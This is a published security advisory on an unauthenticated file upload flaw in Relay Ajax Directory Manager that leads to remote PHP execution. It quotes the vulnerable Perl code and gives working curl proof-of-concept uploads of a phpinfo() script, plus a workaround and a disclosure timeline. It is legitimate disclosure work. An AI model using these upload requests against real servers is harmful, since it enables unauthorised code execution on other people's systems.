扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 |
Advisory: Unauthenticated File Upload in Relay Ajax Directory Manager may Lead to Remote Command Execution A vulnerability within the Relay Ajax Directory Manager web application allows unauthenticated attackers to upload arbitrary files to the web server running the web application. Details ======= Product: Relay Ajax Directory Manager Affected Versions: relayb01-071706, 1.5.1, 1.5.3 were tested, other versions most likely vulnerable as well. Fixed Versions: - Vulnerability Type: Unauthenticated File Upload Security Risk: high Vendor URL: https://github.com/HadoDokis/Relay-Ajax-Directory-Manager Vendor Status: decided not to fix, project is unmaintained Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2016-005 Advisory Status: published CVE: GENERIC-MAP-NOMATCH CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH Introduction ============ Relay Ajax Directory Manager[1], also known as relay[2], is a web-based file manager. It allows files and folders to be uploaded via drag and drop and provides several other features, such as a thumbnail preview for images and basic user authentication functionality. More Details ============ While the web application itself is mostly written in PHP, it also utilizes the Perl script 'upload.pl' for handling uploads initiated by the user. Uploading is a multi-step process: 1. The user initiates a multipart/form-data upload request through the web application. This request is sent to the Perl script and the following steps are handled by it. 2. A temporary file containing the entire request (including headers) is created. This temporary file is named partly by the first URL parameter, as shown in the following listing. 3. The headers and the POST body of the request are parsed and filtered to determine the final filename. 4. The upload is written to the final destination. 5. A file containing statistics about the upload process is written During steps 2-5, no checks are performed to ensure that the user is sufficiently authenticated. The following listing shows parts of the upload Perl script: -- upload.pl ----------------------------------------------------------- [...] @qstring=split(/&/,$ENV{'QUERY_STRING'}); $sessionid = $qstring[0]; [...] $tmpfile = "$uploadsFolder\\temp_$sessionid"; $statsfile = "$uploadsFolder\\stats_$sessionid.txt"; $tmpfilepre= "$uploadsFolder\\$sessionid\_"; [...] open(FILE,">","$tmpfilepre$filename") or print "can't open temp file"; binmode(FILE); print FILE $filedata; close FILE; [...] ------------------------------------------------------------------------ Here, the first URL parameter is stored in the variable $sessionid. The content of this variable is then used as a prefix for the filename for the uploaded data before it ultimately gets written. Given the configured upload directory, which is 'uploads/' by default, the URL of the uploaded file can be determined. The web application usually requires users to be authenticated before any actions (e.g. uploading) can be performed, but since the Perl script is not secured by any form of authentication, it can be accessed by anyone. If the web server does not prohibit the execution of e.g. PHP files within the upload directory, arbitrary PHP commands can be executed by uploading the respective files to the web server. Proof of Concept ================ In general, the Perl script expects a request containing multipart/form-data. In this case, the name specified in the 'filename' field is prepended with the first URL parameter. Using the command line HTTP client curl, a request like the following can be made to a vulnerable installation of Relay Ajax Directory Manager in order to upload a PHP script which invokes the function 'phpinfo()': curl -i -s -k-X 'POST' \ -H 'Content-Type: multipart/form-data; boundary=----------------------------83ff53821b7c' \ --data-binary $'------------------------------83ff53821b7c\x0d\x0a'\ $'Content-Disposition: form-data; filename=\"info.php\"\x0d\x0a'\ $'Content-Type: application/octet-stream\x0d\x0a\x0d\x0a'\ $'<?php phpinfo(); ?>\x0d\x0a'\ $'------------------------------83ff53821b7c--' \ 'http://example.com/relay-1-5-3/upload.pl?redteam' The server responds with HTTP status code 200 indicating a successful upload: HTTP/1.1 200 OK Date: Mon, 09 May 2016 11:09:50 GMT Server: Apache/2.4.18 (Debian) Content-Length: 0 Content-Type: text/plain Such a request would yield the following files in the web server's upload directory upon success: $ ls relay-1-5-3/uploads/ redteam_info.phpstats_redteam.txttemp_redteam The file redteam_info.php contains the multipart/form-data that was sent to the upload.pl script: $ cat relay-1-5-3/uploads/temp_redteam.php <?php phpinfo(); ?> Requesting this file with the URL http://example.com/relay-1-5-3/uploads/redteam_info.php will then yield the server's output of the phpinfo() function. However, since the entire content of the upload request is saved to a temporary file, a regular POST request containing only the code to be executed is sufficient to exploit this vulnerability. The following invocation of curl uploads the same PHP script which invokes the function 'phpinfo()': $ curl --silent --include --data '<?php phpinfo(); ?>' \ 'http://example.com/relay-1-5-3/upload.pl?redteam.php' In the server's upload directory, the file temp_redteam.php contains the data that was sent to the upload.pl script: $ lsrelay-1-5-3/uploads/ stats_redteam.php.txttemp_redteam.php $ cat temp_redteam.php <?php phpinfo(); ?> Requesting this file with the URL http://example.com/relay-1-5-3/uploads/temp_redteam.php will again yield the server's output of the phpinfo() function. Using either of these methods, an attacker is able to upload arbitrary files to the affected web server e.g. in order to easily execute PHP commands with the privileges of the web server. Workaround ========== One possible workaround would be to prevent the execution of files in the upload directory and deliver them as attachments instead. Fix === None. Security Risk ============= This vulnerability allows unauthenticated attackers to upload arbitrary files to the affected system. In the web server's and project's default configuration it is very likely that this may be used to execute arbitrary commands with the privileges of the web server process. This is possible without authentication, thereby providing no barrier for attackers. It is therefore rated as a high risk. Since this software is quite old and not well maintained, it is likely that additional vulnerabilities exist. However, this was not further evaluated. Timeline ======== 2015-11-19 Vulnerability discovered 2016-04-07 Customer approved disclosure of vulnerability 2016-05-12 Developers contacted, project is no longer maintained 2016-05-31 Advisory published References ========== [1] https://github.com/HadoDokis/Relay-Ajax-Directory-Manager [2] https://code.google.com/p/relay/ RedTeam Pentesting GmbH ======================= RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: https://www.redteam-pentesting.de/ |
体验盒子
